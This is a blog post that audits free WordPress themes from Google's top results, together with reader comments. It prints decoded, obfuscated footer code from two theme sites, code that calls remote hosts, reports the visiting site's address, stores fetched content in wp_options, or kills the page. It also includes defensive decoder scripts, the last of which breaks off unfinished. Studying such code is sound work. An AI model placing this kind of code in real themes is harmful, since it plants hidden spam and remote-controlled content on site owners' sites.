Update: I have written a post about where you can find free WordPress themes. So once you get to the end of this and are suitably concerned you can check it out for some great places to find your themes.
A few months ago I wrote about WordPress Security. Now, armed only with the words “free WordPress themes,” builtBackwards’ Theme Authenticity Checker Plugin and Donncha O Caoimh’s Exploit Scanner, I’m going to take a look through the first page of Google to see just how safe pages ranking for “Free WordPress Themes” are.
Note: I am not uploading any of these themes onto my server. Instead I have installed XAMPP and am running WordPress locally on my computer. I don’t advise uploading themes from random websites directly onto your server – you never know what you could catch! There are some nasty diseases out there…..
1. WordPressThemesBase
WordPress Themes Base is in the lucky position of being the top ranking site for “Free WordPress Themes.” Someone’s been working hard on their SEO! The blurb at the bottom tells the visitor that unlike other sites offering free WordPress themes, the themes at WordPress Themes Base are fresh. Great, there’s nothing better than a fresh theme.
I downloaded Prinz Branford Magazine. Already things are looking problematic. Branford Magazine is a theme released by der Prinz. There is a very old version of the theme which (as far as I can tell) isn’t up-to-date with WordPress 3.0, and a Pro version was released earlier this year. That means we’re looking at either a theme that doesn’t work properly with WP 3.0 or a theme that is a knock-off of the Pro version.
First things first – install the theme and run it through TAC.
Encrypted code found! First site on Google and we’ve already come across Base64 :( Poor me….. Base64 is often used to hide malicious code. I can see that the code is in the footer. Let’s take a look at that:
Yeah, copyright me, damned right! But what is that Base64 hiding. Here it is in the footer code:
Lots of blah.
You can decode this base64 code in two ways:
- You can try Otto’s decoder – handy!
- You can also do it manually – this involves changing the eval() to an echo() to force whatever’s been hidden out of hiding. This post will walk you through the process.
I’ve gone for option 2. Turning my eval() into an echo() produced this result in my footer:
Eh? A minute ago it said copyright me!!! Bah! Now there’s something about Free Anti-Virus Downloads. Where did that come from? Hidden by the base64 methinks.
The Verdict:
I downloaded another 2 themes from this site and they all contained base64 code. Base64 does not necessarily just hide links. It can also hide malicious code which can run amok on your site. Not only that but the site, while maintaining that its themes are fresh, is pushing themes built by other designers that the site owner has put base64 code into. I contacted Michael Oeser at der Prinz, who told me that he’s been trying to get in touch with the site about removing the theme but is having no luck. He’s posted a warning on his own blog about the dangers of downloading pirate themes. He’s the designer of Branford Magazine and his advice is to stay well away from sites like this – good advice!
My suggestion:
Avoid!
2. Free WordPress Themes
Another site with free WordPress themes. Great! Just what I need. I’m always after a good freebie. The first theme on the site is called BeautyStore. I like beauty stores so I’ll download that. Get it installed and run it through TAC.
More encrypted code!!!
Here it is in the footer:
For a beauty store it’s not all that beautiful. There are all sorts of encoded functions right in the footer. This time when I turned my eval()s into echo()s I couldn’t get anything to appear. I ran it through a few decoders and it’s far too jumbled up for me :(
Exploit scanner dislikes it as much as I do:
All of these came up as severe warnings.
The Verdict
2nd site on Google and we’re getting more base64. I downloaded a few other themes which contained static links and no base64. I guess that this site is a bit hit and miss. However, with the previous site I could get it decoded and with this one, no go. A search on some forums for the pieces of code in the footer indicates that it may be encrypted code used for hacking :( I ain’t techie enough to know and I suspect that most WordPress users aren’t either. In that case….
My Suggestion
Avoid!
3. Themes2WP
Scanning through the themes on Themes2WP, they’ve certainly got some tempting ones on there. Let’s take a look at Gameliso, which looks like a nicely designed magazine theme.
Theme Authenticity Checker says that it has found 5 static links. Static links are okay, right? A developer’s got to link back to their site. Here are the links:
Hmmmmm… I don’t know about you, but I don’t know if singles sites and animal care sites have much to do with theme development. Let’s take a closer look at the code in footer.php:
There are the links, with the helpful message: “Please do not edit following code, it may cause your site to stop working.” What useful information!!!! I would’ve gone and removed the links and broken the whole thing. Phew.
Oh wait… I did remove them and the site still seems to be working.
There’s another link in sidebar.php. Here it is:
Now to check out the styles for ad_lnk:
Wow! That’s a link that’s way out in the middle of nowhere. Can’t be for much except back-linking programmes.
So we’ve checked out the links – let’s run exploit scanner.
Gameliso is picked up as containing an eval() which could be used to execute malicious code. It’s not the type of thing that you want to have showing up in your theme.
The Verdict
Nice themes, but they contain 5 backlinks to random people who you probably aren’t interested in linking to. It goes so far as to tell you that if you remove the links your theme won’t work. Of course, we know that this isn’t true – but a beginner WordPress user might think twice about removing them. As for the eval function, well it could be harmless but I don’t know enough about JavaScript (probably like many average WordPress users) to tell you if in this case it is or it isn’t.
My suggestion
Avoid!
4. FreeWPThemes
After assuming that all sites that aren’t WordPress.org are bad, I was surprised to find no odd embedded links in any of the themes that I downloaded from FreeWPThemes. I downloaded 5 themes, from across the site. And they all had the same links:
None of these appear at all out of place. So, I felt a bit bad about my assumptions.
However, I did run the themes against the Theme Check Plugin. The plugin tests your theme to make sure it’s up to the latest theme review standards. Here’s how the Programme theme did:
Lots of errors! There’s even more than that but I couldn’t fit them all into the screenshot.
The Verdict
While the themes from FreeWPThemes might not live up to the exacting standards of the WordPress theme directory, there is nothing malicious about them, nor are there any backlinks. It may be that you come across things that aren’t working in quite the way that you want them to, but there’s nothing hidden or evil about them!
My suggestion
Okay to use but check to make sure all of the functionality that you need is working.
5. WordPress.org
Finally! WordPress.org! We all know and love WordPress.org. It is the safest place to go to get your themes. I guess the problem that we all have with the theme repository is that many of the themes look like they were made back in the 1600s (or near enough). This can be frustrating, especially when many of them don’t work too well with WordPress 3.0. At the bottom of this post I’ll list some other safe places that are great for themes.
The Verdict
A totally trusted and safe place to get your free WordPress themes from.
My suggestion
<3
6. Themes.Rock Kitty
This site has a picture of a cat playing a guitar. I am easily pleased by things with cats on them. The first theme that I downloaded had no advertising links or hidden code in it, nor did the second. But the third came up with this:
More Base64!
This time changing my eval()s to echo()s produced this message:
The links at the bottom of the theme appear like this:
Exploit scanner came up with 17 severe warnings for this theme. Since there are only 4 links showing at the bottom I think we can assume that this theme is either packed full of hidden backlinks or there is something else going on.
The Verdict
Use this site very carefully. If you are going to download themes from them install the themes on your local machine and check them out first. This is another site where you could end up downloading a theme that hijacks your site. Be careful!
My suggestion
Avoid!
7. WP Themes Depot
Another website offering the most up-to-date, fresh, beautiful, free WordPress themes. This time I downloaded the most popular theme on the site, Niferiti, downloaded 980 times. Once again I ran it through TAC and came up with encrypted code:
After changing the eval() to an echo() I got this message (again):
Someone obviously doesn’t want me to get rid of the code. The links appear in the footer like so:
It feels a bit disingenuous to me to say that these are links from family and friends. Especially since we’ve seen that message before with different links. But I guess it’s possible that all spammy links come from the same family…… just maybe….. right?
Update: Okay, so I mustn’t have been paying attention to that message. I = doofus! Once again a lesson in reading things properly. In any case, links, whether family friendly or not, should not be hidden using encrypted code that is often used to mask other activity.
The Verdict
Another site with Base64 in the code. I guess I don’t have to repeat how untrustworthy code like this is. While it’s one thing for a developer to include backlinks, it’s another when they use base64 to encode the links. Especially when it’s well known that the code is used to hide malware.
My suggestion
Avoid!
8. WPRex
I downloaded 5 themes from WPRex: the first two contained static spammy links and the other three contained (surprise surprise) base64.
That’s Pink Desire. This time to decode it I used this decoder.
Here’s what it spat out:
More encrypted links. People do go to quite some lengths to hide their links!
The Verdict
Another site that is a bit hit and miss. If you must download themes from a place like this make sure you check out what it is you have by using something like TAC. You can also use some of the decoder tools I’ll list at the bottom to check out what any base64 is hiding.
My suggestion
Avoid!
9. No Limits Web Design
While this website has a slightly different name from all of the rest, making me hope for something different, upon landing it has the same announcement about all its great free WordPress themes. I downloaded one of the featured themes – Dark Night – and yet again found more base64 in the theme.
As well as the base64 I found a piece of code starting eval(str_rot13(. You can decode that here.
I got these results:
That’s basically the license. However, when I turned the eval to an echo this code appeared at the top of the page:
function wp_code() { $default_link_text = "Default"; $link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php"; $link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php"; $l = ""; foreach($link_host as $value) { if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) { while (!feof ($file)) { $line = fgets ($file); $l .= $line; } fclose($file); break; } else { if ($value == end($link_host)) { $l=$default_link_text; } } } return $l; } function check_wp_code_sidebar() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { } else { $l=""; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); fclose($fd); if (strpos($c, $l) == 0) { die; } } } check_wp_code_sidebar();
I got one of our lovely Incsubbers to take a look at it and he translated it as:
function wp_code() {
	$default_link_text = "Default";
	// Remote hosts that serve the link block; this blog's own URL is sent along as ?url=
	$link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
	$link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
	$l = "";
	foreach($link_host as $value) {
		// Fetch the link markup from the first host that answers (errors silenced with @)
		if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
			while (!feof ($file)) {
				$line = fgets ($file);
				$l .= $line;
			}
			fclose($file);
			break;
		} else {
			// Neither host answered: fall back to the placeholder text
			if ($value == end($link_host)) {
				$l=$default_link_text;
			}
		}
	}
	return $l;
}
function check_wp_code_sidebar() {
	$uri = strtolower($_SERVER["REQUEST_URI"]);
	// Does nothing on admin and login pages, so the site owner never sees the effect there
	if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
	} else {
		$l="";
		// Read this theme's own sidebar.php and kill the page unless $l is found in it
		// (as listed here $l is empty, so the check fires on every public page)
		$f = dirname(__file__) . "/sidebar.php";
		$fd = fopen($f, "r");
		$c = fread($fd, filesize($f));
		fclose($fd);
		if (strpos($c, $l) == 0) { die; }
	}
}
check_wp_code_sidebar();
The theme pulls URLs from a remote server into the sidebar, and if they don’t appear then it dies. Poor site :(
Here’s what exploit scanner has to say:
The Verdict
Another site using base64, another one to stay out of the way of. This one is even more heavily obfuscated than the others, which revealed what they were up to much more quickly.
My suggestion
Avoid!
Phew… getting to the end now… this is exhausting!
10. Templates Browser
Nearly at the end! Actually I did a little search about Templates Browser and found this post. So we can already guess what’s going to happen here. I downloaded the Dropshadow theme, which is actually by Brian Gardner but which you can no longer get from his site (probably because it’s pretty old and not WP 3.0 compatible). Although the TAC only found static links like so:
The static link in the footer is a huge piece of PHP. The source code of the site reveals that it is calling a link to a casino site. However, it has some elements that write to the database, which make me more suspicious. I got my friendly Incsubber to partially decode it:
// The first line is cut off in the listing; its start is reconstructed from the matching $l_code line below
$l_time_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");

// Two rows are created in wp_options: a timestamp of the last fetch and the cached remote content
if (empty($l_time_code)) {
	$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
	$new_time_code = 0;
} else
	$new_time_code = intval($l_time_code[0]);

if (empty($l_code)) {
	$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '
', 'no')");
	$new_l_code = '
';
} else $new_l_code = $l_code[0];

// At most once every 60 seconds, fetch fresh content from the remote host
if ( ( time() - $new_time_code ) >= 60 ) {
	// The host name is split across hex-named variables to defeat simple string searches
	$R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
	$R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
	$R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
	$xps = "xps.";
	$url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
	// The visiting site's host name and request path are reported to the remote server
	$page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);

	//1.xpstatz.com/xps.php?h=host&u=uri

	if (ini_get('allow_url_fopen')) {
		$new_l_code = @file_get_contents("http://" . $url . $page);
	}
	else {
		// Fallback when URL wrappers are disabled: a hand-written HTTP request over a raw socket
		// (the \r\n escapes were lost in the listing and are restored here)
		$RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);

		if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
			@stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
			@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
			@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
			@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
			$new_l_code = "";
			while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
				$new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
			}
			// Strip the HTTP headers: keep everything after the first blank line
			$new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
		}
		@fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
	}
	// If the reply carries the [/] end marker, cache it and the fetch time in wp_options
	if ( strpos($new_l_code, '[/]') ) {
		$new_time_code = time();
		$R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
		$wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'"); $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
	}

}
// Print whatever sits between the [] and [/] markers into the footer
if ( strpos($new_l_code, '[/]') ) {
	$R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
	$R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
	echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
	$RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
}
?>
Doesn’t mean a whole lot to me either….
But it stores the links in wp_options and checks every 60 seconds to grab the code from an external site. Then it updates the timecodes and links in the options table before outputting them in the footer.
Basically a much more complex method of doing everything that we’ve seen already.
The Verdict
Things are already looking suspicious when another site is claiming that Templates Browser contains malware. And even more suspicious when they’re hawking an old theme which has been designed by an established WordPress designer. All of that code in the footer is not good, and is another way of taking control of your site.
My suggestion
Avoid!
Here’s a video from ThemeLab which does what I did, but quicker!
Conclusion
Out of the ten sites on the first page of Google, here are the stats:
- Safe: 1
- Iffy: 1
- Avoid: 8
8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes, but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress for the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.
Of course, the WordPress Theme Directory can be frustrating in its lack of themes that work with WordPress 3.0. Many of the themes look a little out of date and lots look very bloggy. Here are some trusted sites where you can find WordPress themes, free and otherwise.
Free Themes
Premium Sites
There are plenty more so look around! Don’t type free WordPress themes into Google though!
Tip: A legitimate site offering free WordPress themes will not have the word “WordPress” in its url. WordPress is trademarked and if a site is going to violate trademarks it’s likely to be unscrupulous about inserting spam and other code into themes. Here’s what WordPress have to say about it. (thanks to Jim - see comments below – for correcting me on that!!!!)
Decoders
If you are investigating a theme that you think is suspicious you might find the following decoding tools helpful (source):
- $o= (Otto’s decoder)
- $_F=__FILE__
- eval(gzinflate(base64_decode('...')));
- eval(str_rot13(' ... '));
- Other codes
- Manual base64 decode
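As an added example (not from this post and not part of TAC, Exploit Scanner or any of the decoders above), here is a small Python script that does the manual eval-to-echo trick statically: it peels the wrapper shapes listed above (base64, gzinflate+base64, str_rot13) off a theme file without ever running the PHP, then checks the recovered code for the behaviours seen in the footers dissected in this post. The analyse()/unwrap() functions and the indicator names are my own, and the footer it inspects is a constructed sample built inline, not a real theme.

```python
"""Static decoder for eval()-wrapped theme code. Nothing here executes PHP."""
import base64
import codecs
import re
import zlib

# The three eval() wrappers the Decoders list above covers. Group 1 is the quote
# character, group 2 the payload. The gzinflate form is tried first so that the
# plain base64 pattern does not also claim it.
_QUOTED = r"(['\"])((?:(?!\1).)*?)\1"
WRAPPERS = [
    ("gzinflate+base64",
     re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*" + _QUOTED, re.I)),
    ("base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*" + _QUOTED, re.I)),
    ("str_rot13", re.compile(r"eval\s*\(\s*str_rot13\s*\(\s*" + _QUOTED, re.I)),
]

# Heuristics for what the unwrapped code does. They are indicators, not proof: a theme
# that reads a file is not automatically bad, but the footers dissected in this post
# combine a remote fetch, reporting the blog URL, writes to wp_options and die().
INDICATORS = [
    ("file/URL fetch at runtime",
     re.compile(r"\b(fsockopen|file_get_contents|curl_init|fopen)\s*\(", re.I)),
    ("reports site URL to a third party", re.compile(r"\?url=|HTTP_HOST", re.I)),
    ("die()/exit() in template code", re.compile(r"\b(die|exit)\s*[;(]", re.I)),
    ("stores fetched content in wp_options",
     re.compile(r"(INSERT\s+INTO|UPDATE)\s+\$wpdb->options", re.I)),
    ("hex-mangled variable names", re.compile(r"\$R[0-9A-F]{32}\b")),
    ("emits a link", re.compile(r"<a\s[^>]*href\s*=", re.I)),
]


def decode_layer(kind, payload):
    """Reverse one wrapper statically (the eval-to-echo step, minus the eval)."""
    if kind == "base64":
        return base64.b64decode(payload).decode("utf-8", "replace")
    if kind == "gzinflate+base64":
        # PHP's gzinflate() is raw DEFLATE, which zlib reads with negative wbits.
        return zlib.decompress(base64.b64decode(payload), -15).decode("utf-8", "replace")
    if kind == "str_rot13":
        return codecs.decode(payload, "rot_13")
    raise ValueError("unknown wrapper: " + kind)


def unwrap(php_source, max_depth=8):
    """Peel nested wrappers until none is left. Returns (readable_code, layers_peeled)."""
    text, layers = php_source, []
    for _ in range(max_depth):
        for kind, rx in WRAPPERS:
            match = rx.search(text)
            if match:
                break
        else:
            break  # no known wrapper remains
        layers.append(kind)
        text = decode_layer(kind, match.group(2))
    return text, layers


def analyse(php_source):
    """Unwrap, then report which indicators the readable code triggers."""
    text, layers = unwrap(php_source)
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return {"layers": layers, "decoded": text, "indicators": hits}


# Constructed sample (not a real theme): the footer pattern the post describes, built
# here so the script runs offline. The innermost code prints a link and kills the page
# when its CSS hook is gone; it is wrapped in str_rot13, then in gzinflate+base64.
INNER = ('echo "<a class=ad_lnk href=http://example.com/free-antivirus>Free Anti-Virus</a>";'
         ' if (strpos(file_get_contents(dirname(__FILE__) . "/footer.php"), "ad_lnk") === false) { die; }')


def _deflate_b64(text):
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, as PHP's gzdeflate() makes
    return base64.b64encode(comp.compress(text.encode()) + comp.flush()).decode()


SAMPLE_FOOTER = ('<?php /* footer.php */ eval(gzinflate(base64_decode("'
                 + _deflate_b64("eval(str_rot13('" + codecs.encode(INNER, "rot_13") + "'));")
                 + '"))); ?>')

if __name__ == "__main__":
    report = analyse(SAMPLE_FOOTER)
    print("layers peeled:", " -> ".join(report["layers"]))
    print("indicators:", report["indicators"])
    print(report["decoded"])
```

Pasting either of the two decoded listings from this post into analyse() as a string would flag the ?url= report and die in the No Limits sidebar check, and the wp_options writes, HTTP_HOST report and $R-named variables in the Templates Browser footer.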
Useful Plugins
Further Reading
- Chip Bennett analyses the top 30 sites ranking for WordPress Themes on Google
- Otto on the Anatomy of a Theme Malware
- ThemeLab on why you should stop downloading WordPress Themes from shady sites
If my app/code/theme/script is so good… why do I have to lie/trick people into actually using it?
If it was THAT good… wouldn’t everyone WANT to use it?
Thank you so much for this information. It is really nice to have people like you who can tell people like me who don’t know much about these things about what could happen.
I like your research, I have found one of your recommended sites theme hybrid to be suspect
My brother suggested I may like this blog. He was entirely right. This put up actually made my day. You can not consider just how so much time I had spent for this information! Thanks!
Good article. Need to be more careful with these themes now.
I am a newbie at wordpress, setting up wp websites for friends and family. Inasmuch as most of the sites I set up are on a budget, we use free wp themes on all of them. I was utterly aghast at your findings, and to think that I just click on those top serp sites and download the free themes assuming that their makers are cool honest guys.
Now, I have some tools to use to check these themes. The TAC tool however seems to have been un-updated since 2009.
Hi James, you are right, Theme Authenticity Checker is not updated but it still works with the latest WordPress version and protects many WordPress users from malicious themes.
I have already come across several sites which do the same. In most of the cases, I avoid using those themes. Merely glancing at the footer.php gives you an idea how bad these themes could be. Avoid Avoid Avoid
Wow, this is a scary article, but essential reading. I didn’t realise so many free theme sites were adding rogue code to their themes. I’ve just downloaded the Arras theme (minus Tim Thumb to avoid the vulnerability issue) and will give it a test run to see if it can replace some of the themes we’re using. Thanks for all the excellent information.
No matter how many times I come across your it never gets old. You definitely hit the trend of fashion and latest style
Another theme that has malware on it is Groove Bordeaux. I downloaded it because I liked the look but when I did I ended up with my sites being hacked. I was able to go through the code and clean it up.. but definitely one to stay away from too.
Cheers
John
Great work Siobhan. I don’t know if this was pointed out by your other commenters, but the globalEval code caught by Exploit Scanner is likely just a bit of harmless jquery. Not sure why Exploit Scanner is chucking a wobbly over that, it’s found in every installation of wordpress that uses jquery. You can see the exact same verbiage yourself by doing a test search of any local or server copy of jquery.js
Thanks for turning us on to some great tools, too!
Well, OK. I have to say, what a wonderful it is. Thank you for your sharing so good in the website. I like it very much.
This post really goes the extra mile when delivering what people need to hear. Thank you for posting this :)
Hiii… I read the post and liked it very much; also it was very helpful.. but tell me, what is ‘TAC’? Is it a plugin???
Then from where can I get it??
Please reply!
Thank you for posting this.
How about this site? Is it safe? http://fthemes.com/
Great work Siobhan, I am happy I found this post. I tweeted and I follow u. I am a newbie, just a month old. The other day, when I analysed my site with a tool I found some links with which I was not familiar. I was suspecting something, but I could not find where they were coming from. Now I know. Thanks, great info.
Thanks for taking out the time to inform. Very useful article, but a bit scary, too!
Oh good god, my boss made me use “Gameliso” and the site is live. What should I do…..
Thanks , I’ve just been searching for information about this subject for a while and yours is the greatest I have discovered so far. However, what concerning the conclusion? Are you positive concerning the supply?|What i do not realize is in fact how you are not actually a lot more neatly-appreciated than you might be right now. You are very intelligent.
Great post, very informative. I ponder why the opposite specialists of this sector don’t realize this. You should continue your writing. I am confident, you’ve a great readers’ base already!|What’s Taking place i’m new to this, I stumbled upon this I have discovered It positively helpful and it has helped me out loads. I hope to contribute & help other customers like its helped me. Great job.
Heya i’m for the primary time here. I came across this board and I find It really useful & it helped me out a lot. I’m hoping to offer one thing again and aid others such as you aided me.
I’d like to point out that generally I would agree with the sentiment of your article in regards to free WP Themes (I hate encrypted ones). That is why we devoted our site to the best in free wp themes (non-encrypted). Check it out if you have the time. It will be worth it!!
Themes with encrypted code usually have all kind of fancy features, slider, outstanding design etc. This code simply is meant to have those commercial links not removed. Agreed, themes have to be thoroughly checked before going to your server.
On the other side, if you buy a premium theme, things are also complex. Many premium themes load awfully slowly. Constant WordPress updates require you to also have your theme upgraded, but who guarantees that? Premium themes are rarely tested on all different types of servers, surely a risk factor. Many WordPress users meanwhile have thousands of articles/comments. To buy a premium theme and then to find out that the pics of all your 5000 posts are not activated as featured images with the proper size and therefore don’t show up in the newly bought premium theme is another obstacle. So yes, agreed, the temptation to carelessly try out “free themes” is there.
Very informative blog. I haven’t used WordPress yet but I was very keen on learning about it. I always search on Google and it scared me upon learning that these top search engines might contain malware. Thank you for sharing, most specially guiding us where to find free WordPress themes which is safe. Brilliant post!
Excellent items from you, man. I’ve remember your stuff previous to and you are simply extremely great. I really like what you have bought right here, certainly like what you are saying and the way through which you are saying it. You are making it entertaining and you continue to take care of to stay it smart. I can’t wait to read much more from you. That is actually a tremendous website.
Thank you for giving me information where to find WordPress without being scared I might stumble on malware. I’m just so glad I came across this blog, very helpful really. I always depend on google for years, so surprised of these top search engines containing malware. Thanks again!
It’s actually a great and helpful piece of info. I am satisfied that you simply shared this useful information with us. Please keep us informed like this. Thank you for sharing.
My brother recommended I would possibly like this website. He was entirely right. This submit truly made my day. You cann’t believe just how much time I had spent for this info! Thank you!
Scary to know about this, especially with content you trust and then bad happens. You awaken my eyes. Keep up good work
It is in reality a nice and useful piece of information. I am happy that you just shared this useful information with us. Please stay us up to date like this. Thanks for sharing.
Yes. You are right, I always check with the plugin when I install a new free WordPress theme for my blog.
Do not trust TAC : http://www.boiteaweb.fr/security-plugin-review-tac-theme-authenticity-checker-3149.html (french post sorry)
WordPress sucks. Learn how to program
Obviously over 22% (and growing daily) of all of the website owners and corporations in the world including (just to name a few) CNN, Yahoo, Harvard, NASA, FOX, The New York Times, Flickr, Rolling Stone, Meebo, C|net, Le Monde, Nancy Pelosi, Rosie O’Donnell, Stephen Colbert, Anousheh Ansari, Stanford, MIT, Second Life, Xerox, The US Post Office, Ford Motors….disagree with you.
They aren’t using “programmers” they are using WordPress Developers. You need to add some skills to your resume my friend. The web is passing you by.
Thank you for all the effort you’ve put into the investigation and the article, even though I just found it now. I was aware of all those things prior to reading your article, but I was doing all the checking for base64 and unwanted links by hand. Thanks to you, I found about TAC and I just ran all the free themes I’m using for the sites I run or manage through it. It saves a lot of time and effort! Thankfully, I have developed my own theme for my personal website, so no need to worry about it :) I would recommend that to everybody who has the knowledge and skill, and of course – the time!
Thank you again for pointing that great plugin put for me :)
This has great information for learning. A new online magazine FLORIDA STANDARD has been published. It has all content of our life style and also have up-to-date event & information that can increase our knowledge. Here’s the link- I think this magazine will helpful for you.
http://www.TheFloridaStandard.com
very interesting article. I think i need to check every thing one’s again, Thanks for your information, keep writing. http://www.couponcodesindia.com/diythemes.com/
Hallo:)
I have just started up my own website, and until now I have only installed plugins (Antivirus, BPS, Exploit Scanner, Secure WordPress, TAC and WP-Malwatch) to secure my site. When I scan with Exploit Scanner it shows me 16 severe-level warnings, e.g. located in plugins: Antivirus, WP-Malwatch and Secure WordPress. In these it shows base64 and eval.. How can that be possible? Are these plugins not secure to use?
Hope someone can help me:)
Wow, and this is why you do NOT hunt down for free wordpress themes on Google.
Hope more people actually knew how much they are compromising their server’s security but people seem to not care.
Sergio
This valuable information came at just the right time! I have 2 questions….first, I tried to duplicate what you did and I was never able to get the encrypted code I found using TAC and Otto’s decoder to decode into anything intelligible. I can’t figure out how to select out the proper snippet I think.
Second and most important…I have a site with a free theme and I found a lot of embedded base64 code. If I install a clean theme, will my site then go on to recover from the SEO damage done?
WOW!! This article is really full of great info.
Thank you for all of your time searching.
I just found your site with this page. Absolutely loved it. Bookmarking it right away.
Great insights into the search term. I’ll be sure to watch out for these now. Thanks a lot
Nice work with all the detail.
But who doesn’t already know this information.
None of this is malicious nor harmful, you just hated on some websites because its trendy to diss free WP themes.
Sean – in reality, this could be both malicious and harmful. If your site links out to bad neighbourhoods (and chances are that base64 hidden links are likely to point to spammy sites) it can easily end in a Google penalty, particularly if it’s a new / untrusted site…
Matt
Remove Text Enhance
http://botcrawl.com/how-to-remove-text-enhance/
Man, that’s some detail there
At the beginning itself you’ve mentioned not to upload the theme directly to the server. But I don’t think people do so. One thing I would like to say here is that you’ve made some good points on how not to be a hunter..
WordPress Plugins
Great Post. A few times I’ve had to do this search, mainly due to severe limitations in budget. The code is fairly easy to sniff out, normally in the footer.php file, and if you know how you can remove it yourself … you can take that base64 code and dump it here http://www.opinionatedgeek.com/dotnet/tools/base64decode/ for example. From that you strip out that bit of code and take the rest back, replacing the base64 section… it is that simple.
So if you must go down this path do so with care.
Also note most free premium type themes will have, say, images called with base64 – these are used as metrics and not links to another site… it means Woo can see who is using that theme for example and how popular a theme is, such that it can decide which theme needs updating maybe.
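The procedure in the comment above (find the base64 blob in footer.php, decode it, strip the offending statement, keep the rest) and the distinction it draws between an eval()’d payload and a harmless base64-encoded image can be automated. The script below is an added example written for this page; it is not code from the post, from any theme, or from the TAC or Exploit Scanner plugins. The footer.php contents, the hidden link payload and the 1x1 GIF are constructed samples, and the heuristics (eval() wrapper, or decoded text containing links/markup, counts as suspicious) are an assumption about what a typical footer injection looks like, not a complete detector.

```python
import base64
import re

# Two common places base64 turns up in a theme file:
#   1. a PHP call that decodes (and usually eval()s) a string literal
#   2. an inline data: URI, e.g. an embedded image or tracking pixel
PHP_B64_RE = re.compile(
    r'base64_decode\s*\(\s*[\'"](?P<blob>[A-Za-z0-9+/=\s]+)[\'"]\s*\)')
DATA_URI_RE = re.compile(
    r'data:[\w.+-]+/[\w.+-]+;base64,(?P<blob>[A-Za-z0-9+/=]+)')
# The whole eval(base64_decode("...")); statement, so it can be cut out cleanly.
EVAL_WRAPPER_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*[\'"][A-Za-z0-9+/=\s]+[\'"]\s*\)\s*\)\s*;?')

# Constructed sample footer.php (not from any real theme): a hidden
# sponsored link injected via eval(base64_decode(...)) next to a harmless
# base64-encoded 1x1 transparent GIF of the kind used for theme metrics.
HIDDEN_PAYLOAD = b'<a href="http://example.invalid/">sponsored link</a>'
SAMPLE_FOOTER = (
    '<div id="footer">\n'
    '<?php echo "Copyright"; ?>\n'
    '<?php eval(base64_decode("'
    + base64.b64encode(HIDDEN_PAYLOAD).decode() + '")); ?>\n'
    '<img src="data:image/gif;base64,'
    'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" alt="">\n'
    '</div>\n'
)


def _decode(blob):
    """Strictly decode a base64 blob; return None if it is not valid base64."""
    try:
        return base64.b64decode(re.sub(r'\s+', '', blob), validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None


def find_base64(source):
    """Locate base64 blobs in a PHP/HTML source string and decode each one.

    Returns a list of dicts with the blob kind, the decoded text, whether it
    was passed to eval(), and a heuristic 'suspicious' flag.
    """
    findings = []
    for m in PHP_B64_RE.finditer(source):
        decoded = _decode(m.group('blob'))
        text = decoded.decode('utf-8', 'replace') if decoded is not None else ''
        # Look a few characters back to see if the decode feeds eval().
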